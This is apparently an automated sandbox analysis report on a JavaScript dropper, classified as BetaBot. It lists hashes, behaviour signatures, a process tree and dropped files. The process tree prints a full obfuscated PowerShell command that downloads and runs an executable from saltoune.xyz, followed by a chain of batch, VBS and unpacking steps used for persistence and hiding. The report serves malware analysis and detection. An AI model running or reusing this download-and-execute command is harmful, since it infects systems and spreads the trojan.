Analysis

  • max time kernel
    298s
  • max time network
    300s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-06-2021 16:28

General

  • Target

    CFDI 1675442 76821.js

  • Size

    34KB

  • MD5

    fef5d85788af40d874612dab6910f000

  • SHA1

    e0510f670e82ccfd1f6d74e925fbe170c7625846

  • SHA256

    4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264

  • SHA512

    d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://saltoune.xyz/pb/aa.exe

Signatures

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Modifies firewall policy service 2 TTPs 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Sets file execution options in registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3320
      • C:\Users\Admin\AppData\Local\Tempkmt12.exe
        C:\Users\Admin\AppData\Local\Tempkmt12.exe
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1208
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\183.bat" "
            5⤵
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1580
            • C:\Windows\SysWOW64\timeout.exe
              timeout 0
              6⤵
              • Delays execution with timeout.exe
              PID:1860
            • C:\Windows\SysWOW64\PING.EXE
              ping dhgfg sgudy
              6⤵
              • Runs ping.exe
              PID:1528
            • C:\LMPupdate\set\unpakedree.exe
              "unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
              6⤵
              • Executes dropped EXE
              PID:2304
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              6⤵
              • Delays execution with timeout.exe
              PID:2516
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2704
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\48551.bat" "
                7⤵
                • Checks whether UAC is enabled
                • Maps connected drives based on registry
                • Suspicious use of WriteProcessMemory
                PID:3180
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\LMPupdate\set"
                  8⤵
                  • Views/modifies file attributes
                  PID:4072
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  8⤵
                  • Delays execution with timeout.exe
                  PID:4292
                • C:\LMPupdate\set\xc829374091FD.exe
                  xc829374091FD.exe /start
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3472
                  • C:\LMPupdate\set\xc829374091FD.exe
                    xc829374091FD.exe /start
                    9⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Checks processor information in registry
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4344
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      10⤵
                      • Modifies firewall policy service
                      • Checks BIOS information in registry
                      • Adds Run key to start application
                      • Drops desktop.ini file(s)
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies Internet Explorer Protected Mode
                      • Modifies Internet Explorer Protected Mode Banner
                      • Modifies Internet Explorer settings
                      • NTFS ADS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4612
                      • C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe
                        /suac
                        11⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2208
                      • C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe
                        "C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe"
                        11⤵
                        • Executes dropped EXE
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:4548
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im unpakedree.exe
                  8⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4372
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im unpakedree.exe
                  8⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4404
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
                  8⤵
                  • Views/modifies file attributes
                  PID:4600
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 4
                  8⤵
                  • Delays execution with timeout.exe
                  PID:4236
            • C:\Windows\SysWOW64\timeout.exe
              timeout 6
              6⤵
              • Delays execution with timeout.exe
              PID:3004

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\LMPupdate\set\183.bat

    MD5

    49d00501554543d18a49c5b93c4528f0

    SHA1

    7a73595e37fda30fb1554b9d8bfe8a855f803d0b

    SHA256

    74560d7c92a3cb7c3782e59fb45bd5a9b1a77a619fad985c4d5bdd17a48c2735

    SHA512

    9c6c296b4bd21de5d13dc56dc92eab363bbd982335858a09537a34f2394be5632d34e002dfa73e312f685f45126c3d5d497a3d7c4553c46bcf4b8c65c4178fb6

  • C:\LMPupdate\set\3980392CV.vbs

    MD5

    0c4747ed40d52d992d44951de476c21b

    SHA1

    24cc5271d1a379e0ebdd0814a1148ecd6e7c880a

    SHA256

    3c01bb32fd4de8574e37cb8293e61d869b8f5bbec69f3cb882a17d5d285b3264

    SHA512

    6e7a264c288c8939c5d8f482229c92915a9bef427b5b1b1df8d942ffded006feba548acfa08588327587f34928acb0912d6f464536f5beb8027b78def01cffe1

  • C:\LMPupdate\set\435246.vbs

    MD5

    f6e0c73782e7a0768006b7be0fc4a1a1

    SHA1

    2a5dea82a47544d00bfa99563fb899a41fa7a1f7

    SHA256

    8c968d170289989dcca0c9bb5f2381dd6e38c3cfb6a324e80dbb6e556e6c5317

    SHA512

    89827dcd80d9b5c2eedf18996a882feda400036df0b9691fc30701265f11528b0ab312dc69246f56e0388f75d2fa394329f502f9f796cbec702cd1dbfa9f2703

  • C:\LMPupdate\set\48551.bat

    MD5

    ec8f0f76fe14a110317c3b5c71fce669

    SHA1

    d41207a90b96b124630f3f8ad7f1657cd39a4dd2

    SHA256

    1447333e356ed3c1c5183ebef48730c370429c40137c2255585a1d3ba2a37614

    SHA512

    9e78bf61280430edbc2ed2c5869acc2cde3e92f236f2eabf83f715a0d6fbc3a79a420c94364cdf4863dd5ca68e4b0109eefb34f7571c5acdc14944eaebdf8b1f

  • C:\LMPupdate\set\unpakedree.exe

    MD5

    397a93800d56a2308bffc872d4a08032

    SHA1

    6f5334d51195a521e8a03f0e05ac777b96c77bc4

    SHA256

    efe3abcfde6e9846a99049a68e6a38d0bc42baa3ac1cf6f236c894abef0a7720

    SHA512

    7fc7b6c8ffe640295085cab4e56ba4c3eea9738a2c9fa27d1032fd60bb3a638e93cd2522058b6212dd7237366510a83c7d1d9b3cbd5f9712852c72959ace53eb

  • C:\LMPupdate\set\unpakedree.exe

    MD5

    397a93800d56a2308bffc872d4a08032

    SHA1

    6f5334d51195a521e8a03f0e05ac777b96c77bc4

    SHA256

    efe3abcfde6e9846a99049a68e6a38d0bc42baa3ac1cf6f236c894abef0a7720

    SHA512

    7fc7b6c8ffe640295085cab4e56ba4c3eea9738a2c9fa27d1032fd60bb3a638e93cd2522058b6212dd7237366510a83c7d1d9b3cbd5f9712852c72959ace53eb

  • C:\LMPupdate\set\x0329847998

    MD5

    a5a4cc669d306e9b25ae2202e1ccc565

    SHA1

    4e8e841ba4915641f989a061f092f95f9070d164

    SHA256

    3da185d70e391a0449a2e86823e181ca35f5356306a856701ec92cfee639c705

    SHA512

    5398c3722d4c6119d9a033558ca6fe0d57735b8259b4907cf1844ba2921e48ffad1ae9f1dcc760158857c6fb13572cb4dd897ee6f6c260efce247b2b793b0216

  • C:\LMPupdate\set\xc829374091FD.exe

    MD5

    a8d1d7e6c60c73faf55d64e724e97aa7

    SHA1

    9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687

    SHA256

    5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122

    SHA512

    237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1

  • C:\LMPupdate\set\xc829374091FD.exe

    MD5

    a8d1d7e6c60c73faf55d64e724e97aa7

    SHA1

    9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687

    SHA256

    5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122

    SHA512

    237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1

  • C:\LMPupdate\set\xc829374091FD.exe

    MD5

    a8d1d7e6c60c73faf55d64e724e97aa7

    SHA1

    9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687

    SHA256

    5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122

    SHA512

    237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1

  • C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe

    MD5

    a8d1d7e6c60c73faf55d64e724e97aa7

    SHA1

    9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687

    SHA256

    5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122

    SHA512

    237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1

  • C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe

    MD5

    a8d1d7e6c60c73faf55d64e724e97aa7

    SHA1

    9c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687

    SHA256

    5624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122

    SHA512

    237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1

  • C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe

    MD5

    5aad89d35ec7e782a1efc68441f98bcc

    SHA1

    1bc02754a29cf413a2a89b68f89b25df3066847e

    SHA256

    35617cfc3e8cf02b91d59209fc1cd07c9c1bc4d639309d9ab0198cd60af05d29

    SHA512

    25490392971c0268d55886827db9f4ac3c35baf0803baf3342c2186c4dfa4de8c891ec30b4afd1d40f900671a841057dd30161306fa8239030d11bc820d68ea7

  • C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe

    MD5

    5aad89d35ec7e782a1efc68441f98bcc

    SHA1

    1bc02754a29cf413a2a89b68f89b25df3066847e

    SHA256

    35617cfc3e8cf02b91d59209fc1cd07c9c1bc4d639309d9ab0198cd60af05d29

    SHA512

    25490392971c0268d55886827db9f4ac3c35baf0803baf3342c2186c4dfa4de8c891ec30b4afd1d40f900671a841057dd30161306fa8239030d11bc820d68ea7

  • C:\Users\Admin\AppData\Local\Tempkmt12.exe

    MD5

    808e34a763acd79d01eeb1f54b18a551

    SHA1

    df3f6e0f29d9d65a2afc401ab6938044f24c5506

    SHA256

    86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595

    SHA512

    9638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c

  • C:\Users\Admin\AppData\Local\Tempkmt12.exe

    MD5

    808e34a763acd79d01eeb1f54b18a551

    SHA1

    df3f6e0f29d9d65a2afc401ab6938044f24c5506

    SHA256

    86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595

    SHA512

    9638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c

  • memory/1208-137-0x0000000000000000-mapping.dmp

  • memory/1208-139-0x00000000008A0000-0x00000000008A1000-memory.dmp

    Filesize

    4KB

  • memory/1220-141-0x0000000000000000-mapping.dmp

  • memory/1528-147-0x0000000000000000-mapping.dmp

  • memory/1580-144-0x0000000000000000-mapping.dmp

  • memory/1860-146-0x0000000000000000-mapping.dmp

  • memory/2208-186-0x0000000000000000-mapping.dmp

  • memory/2304-148-0x0000000000000000-mapping.dmp

  • memory/2516-150-0x0000000000000000-mapping.dmp

  • memory/2704-152-0x0000000000000000-mapping.dmp

  • memory/3004-153-0x0000000000000000-mapping.dmp

  • memory/3180-182-0x00000000039C0000-0x0000000003AFE000-memory.dmp

    Filesize

    1.2MB

  • memory/3180-155-0x0000000000000000-mapping.dmp

  • memory/3180-184-0x0000000005620000-0x0000000005621000-memory.dmp

    Filesize

    4KB

  • memory/3320-124-0x0000024386630000-0x0000024386632000-memory.dmp

    Filesize

    8KB

  • memory/3320-115-0x0000000000000000-mapping.dmp

  • memory/3320-121-0x0000024388050000-0x0000024388051000-memory.dmp

    Filesize

    4KB

  • memory/3320-135-0x0000024386636000-0x0000024386638000-memory.dmp

    Filesize

    8KB

  • memory/3320-125-0x0000024386633000-0x0000024386635000-memory.dmp

    Filesize

    8KB

  • memory/3320-130-0x00000243A26A0000-0x00000243A26A1000-memory.dmp

    Filesize

    4KB

  • memory/3472-158-0x0000000000000000-mapping.dmp

  • memory/4072-156-0x0000000000000000-mapping.dmp

  • memory/4236-168-0x0000000000000000-mapping.dmp

  • memory/4252-114-0x0000000000000000-mapping.dmp

  • memory/4292-157-0x0000000000000000-mapping.dmp

  • memory/4344-165-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/4344-171-0x0000000002630000-0x0000000002631000-memory.dmp

    Filesize

    4KB

  • memory/4344-161-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/4344-162-0x00000000004015C6-mapping.dmp

  • memory/4344-169-0x0000000000970000-0x00000000009D6000-memory.dmp

    Filesize

    408KB

  • memory/4344-170-0x0000000000440000-0x00000000004EE000-memory.dmp

    Filesize

    696KB

  • memory/4344-179-0x0000000002650000-0x0000000002651000-memory.dmp

    Filesize

    4KB

  • memory/4344-172-0x0000000002660000-0x000000000266C000-memory.dmp

    Filesize

    48KB

  • memory/4372-164-0x0000000000000000-mapping.dmp

  • memory/4404-166-0x0000000000000000-mapping.dmp

  • memory/4548-195-0x000000001C412000-0x000000001C414000-memory.dmp

    Filesize

    8KB

  • memory/4548-196-0x000000001C414000-0x000000001C415000-memory.dmp

    Filesize

    4KB

  • memory/4548-194-0x000000001C410000-0x000000001C412000-memory.dmp

    Filesize

    8KB

  • memory/4548-197-0x000000001C415000-0x000000001C417000-memory.dmp

    Filesize

    8KB

  • memory/4548-198-0x000000001C417000-0x000000001C419000-memory.dmp

    Filesize

    8KB

  • memory/4548-199-0x000000001C419000-0x000000001C41F000-memory.dmp

    Filesize

    24KB

  • memory/4548-189-0x0000000000000000-mapping.dmp

  • memory/4548-192-0x00000000007E0000-0x00000000007E1000-memory.dmp

    Filesize

    4KB

  • memory/4600-167-0x0000000000000000-mapping.dmp

  • memory/4612-185-0x0000000006980000-0x0000000006982000-memory.dmp

    Filesize

    8KB

  • memory/4612-174-0x0000000000DD0000-0x000000000120F000-memory.dmp

    Filesize

    4.2MB

  • memory/4612-176-0x00000000033C0000-0x00000000033CD000-memory.dmp

    Filesize

    52KB

  • memory/4612-175-0x0000000000B90000-0x0000000000CCE000-memory.dmp

    Filesize

    1.2MB

  • memory/4612-173-0x0000000000000000-mapping.dmp